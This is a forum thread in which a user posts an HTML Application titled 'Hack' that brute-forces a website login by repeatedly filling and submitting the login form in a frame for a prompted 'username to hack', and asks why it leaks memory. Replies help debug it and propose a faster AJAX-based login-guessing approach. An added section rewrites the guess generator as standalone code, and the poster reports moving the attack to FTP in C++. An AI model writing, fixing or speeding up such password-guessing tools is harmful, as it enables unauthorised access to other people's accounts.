Hi all, I made an HTA file. When I use Task Manager to look at the amount of memory it is using, it steadily increases as the program continues. If I remove the line

HTML:
document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_LogonButton").click();

the memory leak goes away. Why is this line causing the memory leak? Thanks in advance.

P.S. I removed some private information so the application may not work properly when run.

HTML:
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hack</title>
<HTA:APPLICATION APPLICATIONNAME="Hack" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize" >
<script type="text/javascript">
var firstTime = true;
var username = "";
var password = "";
// One index per password position; each index selects a character from chars.
var passwordArrayIndices = [0];
var chars = ["a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H",
             "i", "I", "j", "J", "k", "K", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q",
             "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y",
             "z", "Z", " ", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0",
             "!", "@", "#", "$", "%", "^", "&", "*", "(", ")"];
passwordArrayIndices[0] = 0;

function getUsername() {
    username = prompt("Username to hack:", "");
}

function findPassword() {
    var i, j;
    // Carry any position that has run past the end of chars into the position to its left.
    for (i = passwordArrayIndices.length - 1; i >= 0; i--) {
        if (passwordArrayIndices[i] == chars.length) {
            if (i == 0) {
                // Every position has overflowed: reset them all and, because j starts
                // at the current length, append one more position (a longer password).
                for (j = passwordArrayIndices.length; j >= 0; j--) {
                    passwordArrayIndices[j] = 0;
                }
            } else {
                passwordArrayIndices[i] = 0;
                passwordArrayIndices[i - 1]++;
            }
        }
    }
    // Build the candidate password from the indices.
    for (i = 0; i < passwordArrayIndices.length; i++) {
        password += chars[passwordArrayIndices[i]];
    }
    if (password.match("&#") != null) {
        // Skip candidates containing "&#" and go straight on to the next one.
        checkLogin();
    } else {
        // Fill in the login form inside the frame and submit it;
        // the frame's onload then calls checkLogin().
        document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_UsernameBox").value = username;
        document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_PWBox").value = password;
        document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_LogonButton").click();
    }
}

function checkLogin() {
    if (!firstTime) {
        if (document.frames["website"].location.href == "http://www.example.com/default.aspx") {
            alert("Username: " + username + "\nPassword: " + password);
        } else {
            // Wrong guess: advance the last position and try the next candidate.
            password = "";
            passwordArrayIndices[passwordArrayIndices.length - 1]++;
            findPassword();
        }
    }
    firstTime = false;
}
</script>
</head>
<frameset rows="1" cols="1" onload="getUsername(); findPassword();">
<frame frameborder="0" id="website" src="http://www.example.com/Login.aspx" onload="checkLogin();" />
</frameset>
</html>
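Added example, not code from the thread: the candidate-generation logic that findPassword() above implements with passwordArrayIndices (the index "odometer", including the way the password grows by one character once every position has overflowed), written as a stand-alone JavaScript generator so its order and length growth can be checked without a browser, a frame or a target site. It also counts the search space the HTA walks and drives the generator against a plain checker callback instead of a reloading frame. The two-character charset, the length cap and the checker are constructed for the demo; the HTA's own charset has 71 entries.

```javascript
// Added example (not the thread's own code): the odometer-style candidate generator
// behind findPassword() in the HTA above, as a self-contained function.
// The charset, length cap and checker used below are assumptions for the demo.

function makeCandidateGenerator(charset, maxLength) {
  var indices = [0];      // one index per position, each selecting a character from charset
  var started = false;

  // Returns the next candidate string, or null once every string up to maxLength
  // has been produced.
  return function next() {
    if (!started) {
      started = true;     // first call yields charset[0] without incrementing
    } else {
      var i = indices.length - 1;
      indices[i]++;
      // Carry overflow from right to left, exactly like the loop in findPassword().
      while (i >= 0 && indices[i] === charset.length) {
        indices[i] = 0;
        if (i === 0) {
          // Every position overflowed: all are now 0, so add one more position.
          // The HTA gets the same effect from writing passwordArrayIndices[length] = 0.
          indices.push(0);
        } else {
          indices[i - 1]++;
        }
        i--;
      }
    }
    if (indices.length > maxLength) {
      return null;
    }
    var out = "";
    for (var k = 0; k < indices.length; k++) {
      out += charset[indices[k]];
    }
    return out;
  };
}

// Collects every candidate up to maxLength, in the order the generator emits them.
function enumerateCandidates(charset, maxLength) {
  var next = makeCandidateGenerator(charset, maxLength);
  var all = [];
  for (var c = next(); c !== null; c = next()) {
    all.push(c);
  }
  return all;
}

// Size of the search space: sum of charsetSize^k for k = 1..maxLength.
function searchSpaceSize(charsetSize, maxLength) {
  var total = 0;
  var power = 1;
  for (var k = 1; k <= maxLength; k++) {
    power *= charsetSize;
    total += power;
  }
  return total;
}

// Runs the generator against a checker callback and reports how many attempts were
// needed. In the HTA the checker is the frame reload plus the location.href comparison;
// here it is a plain function, so nothing touches the DOM between attempts.
function bruteForce(charset, maxLength, isCorrect) {
  var next = makeCandidateGenerator(charset, maxLength);
  var attempts = 0;
  for (var c = next(); c !== null; c = next()) {
    attempts++;
    if (isCorrect(c)) {
      return { found: c, attempts: attempts };
    }
  }
  return { found: null, attempts: attempts };
}

// Demo with a constructed two-character alphabet and a constructed "secret".
var DEMO_CHARSET = ["a", "b"];
var demoResult = bruteForce(DEMO_CHARSET, 3, function (guess) { return guess === "ba"; });
console.log(enumerateCandidates(DEMO_CHARSET, 2).join(" "));   // a b aa ab ba bb
console.log(demoResult);                                       // { found: 'ba', attempts: 5 }
```

With the HTA's 71-character set this gives searchSpaceSize(71, 2) = 5112 candidates for passwords of up to two characters, each of which the HTA turns into a full page reload of the frame; the generator itself holds nothing but a small array of integers.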
Is there any inline code for the ctl00_MainContentPlaceHolder_LogonButton or events? What's the onclick event doing? Even if that's not the case, you are loading a site into an iframe; since it's brute-forcing, it will do so over and over and over again. Get a tool called 'drip'; it is essentially something that allows you to do detection of leaks. Run the frame source through it a few times, including reloading (memory leaks go through page reloads). If the frame itself is the cause of the leak, then there is very little you can do. You can run things in a browser with a better garbage collector (Firefox 3+, Safari 3+, even IE8... although isn't HTA IE-only?). Another thing: you can try this via a Greasemonkey script instead, using a framework that has a garbage collector and logging in via AJAX / checking the response text; this will actually help you avoid parsing and loading the page every single time. Of course, considering you are actually hacking, I think it's a bit ballsy coming up here and asking for help with your new account and a single post?
Is it possible that the memory leak is because of the target website and not yours, during the process of the login? Have you tried to run the script against a different website?
Hi guys, I modified the code so that you guys can try it. The webpage in the frame is a simple webpage I made hosted on my server. It still leaks. I think it has something to do with the interactions between JavaScript and the DOM. Thanks again.

Code (markup):
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hack</title>
<HTA:APPLICATION APPLICATIONNAME="Hack" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize" >
<script type="text/javascript">
var firstTime = true;
var username = "";
var password = "";
// One index per password position; each index selects a character from chars.
var passwordArrayIndices = [0];
var chars = ["a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H",
             "i", "I", "j", "J", "k", "K", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q",
             "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y",
             "z", "Z", " ", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0",
             "!", "@", "#", "$", "%", "^", "&", "*", "(", ")"];
passwordArrayIndices[0] = 0;

function getUsername() {
    username = prompt("Username to hack:", "");
}

function findPassword() {
    var i, j;
    // Carry any position that has run past the end of chars into the position to its left.
    for (i = passwordArrayIndices.length - 1; i >= 0; i--) {
        if (passwordArrayIndices[i] == chars.length) {
            if (i == 0) {
                // Every position has overflowed: reset them all and, because j starts
                // at the current length, append one more position (a longer password).
                for (j = passwordArrayIndices.length; j >= 0; j--) {
                    passwordArrayIndices[j] = 0;
                }
            } else {
                passwordArrayIndices[i] = 0;
                passwordArrayIndices[i - 1]++;
            }
        }
    }
    // Build the candidate password from the indices.
    for (i = 0; i < passwordArrayIndices.length; i++) {
        password += chars[passwordArrayIndices[i]];
    }
    if (password.match("&#") != null) {
        // Skip candidates containing "&#" and go straight on to the next one.
        checkLogin();
    } else {
        // Fill in the login form inside the frame and submit it;
        // the frame's onload then calls checkLogin().
        document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_UsernameBox").value = username;
        document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_PWBox").value = password;
        document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_LogonButton").click();
    }
}

function checkLogin() {
    if (!firstTime) {
        if (document.frames["website"].location.href == "http://testHTA.no-ip.org/test2.html") {
            alert("Username: " + username + "\nPassword: " + password);
        } else {
            // Wrong guess: advance the last position and try the next candidate.
            password = "";
            passwordArrayIndices[passwordArrayIndices.length - 1]++;
            findPassword();
        }
    }
    firstTime = false;
}
</script>
</head>
<frameset rows="1" cols="1" onload="getUsername(); findPassword();">
<frame frameborder="1" id="website" src="http://testHTA.no-ip.org/test.html" onload="checkLogin();" />
</frameset>
</html>
I need to find a leak detector that can open HTA files because in the normal Internet Explorer, cross-site scripting is not allowed (it says "Access denied.").
There is nothing in your code to cause a leak at a glance: you don't store references to the DOM, and the DOM certainly won't reference you back. You are essentially reloading their page nnnn number of times and the garbage collector is not keeping up. The leak is inherently on the source site and not in your script, IMO. Seriously, try Greasemonkey; it's a sandboxed environment and may do you far better service here.
Depends on the browser and the target page, presence of a framework and whatnot. Some frameworks/GCs sport a very systematic approach to GC, recording all references, assignments and variables and having an unload event that cleans them up. This does not mean they always work; it depends on how the framework is being used... For instance, if I do this in MooTools:

$("mydiv").set("friendDiv", $("myFriend")); // property references $("myFriend") as object, native GC will work.
document.getElementById("mydiv").setAttribute("friendDiv", $("myfriend")); // won't be cleaned up by the MooTools GC as the element was not extended via MooTools. IE won't clean it either.

The examples are countless in how you can create leaks... I don't know of a way to run the native browser garbage collector manually, and you have yet to say what browser you use anyway. Which is why my suggestion was to run this via AJAX in a Greasemonkey script and then simply look at the response.text for bits you know are unique for the logged-in user; that will be a much better solution. AJAX does NOT load into the DOM and no JS will run again, etc.; you don't update any frames, so there shouldn't be any significant leaks, or leaks at all... Now, my understanding of the way Greasemonkey works is that it injects your JavaScript into the page you are visiting, so it will have all the local privileges, including XHR, and use of all of the site's JS functions and DOM access. What more do you want?
Hi again, I've decided to carry out this project using a different approach. I've decided to write a C++ program to do what this HTA does but through FTP. It works and it doesn't leak. It's also faster since I don't have to load a web page each time. Thanks for all of your help.